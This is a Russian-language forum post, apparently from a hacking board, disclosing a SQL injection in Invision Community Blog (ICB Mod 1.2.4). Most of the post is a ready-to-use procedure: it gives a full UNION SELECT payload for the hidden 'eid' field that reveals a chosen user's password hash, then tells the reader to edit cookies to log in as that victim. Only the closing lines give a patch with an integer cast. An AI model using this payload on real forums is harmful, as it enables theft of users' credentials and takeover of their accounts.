• XSS.stack #1 – первый литературный журнал от юзеров форума

Web ICB Mod 1.2.4 - SQL Injection

SAD1ST

CD-диск
Пользователь
Регистрация
07.11.2006
Сообщения
13
Реакции
0
Уязвимые версии: 1.2.4

Обнаружена SQL Injection в ICB Mod 1.2.4

1. Открой любую тему.
2. Ответь на любое сообщение.
3. ЖМИ "Preview message" (Только не выкладывай свой ответ)
4. Сохрани код открывшейся страницы на своей машине.
5. Найди в нём:
<input type='hidden' name='eid' value='<BLOG_ENTRY_ID>' />

6. И Измени <BLOG_ENTRY_ID> на:

<BLOG_ENTRY_ID> UNION SELECT b.entry_id, b.blog_id, b.category_id, b.entry_author_id, b.entry_author_name, b.entry_date,member_login_key, b.entry_category, b.entry, b.entry_status, b.entry_locked, b.entry_num_comments, b.entry_last_comment, b.entry_last_comment_date, b.entry_last_comment_name, b.entry_last_comment_mid, b.entry_queued_comments, b.entry_has_attach, b.entry_post_key, b.entry_edit_time, b.entry_edit_name, b.entry_html_state, b.entry_use_emo, b.entry_trackbacks, b.entry_sent_trackbacks, b.entry_last_update, b.entry_gallery_album, b.entry_poll_state, b.entry_last_vote FROM ibf_members,
ipb_blog_entries b WHERE id=<USER_ID> and b.entry_id=<BLOG_ENTRY_ID> LIMIT 1,1

<USER_ID> - ID чела чей пароль ты хошь увидеть.

7.Жми снова "Preview Button".

8. После обновления страницы ты увидишь HASH пароля того чела, чей ID ты ввёл .

9. Измени куки и заново открой страницу. Ты автоматически войдёшь под акаунтом юзверя чей пас ты нашёл.

Залатать данную уязвимость можно отредактировать файл
forum/modules/blog/lib/entry_reply_entry.php


Изменить надо вот эту строчку
'where' => "entry_id = {$this->ipsclass->input['eid']}"
на
'where' => "entry_id = '".intval($this->ipsclass->input['eid'])."'"




Производитель: Invision Community Blog
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх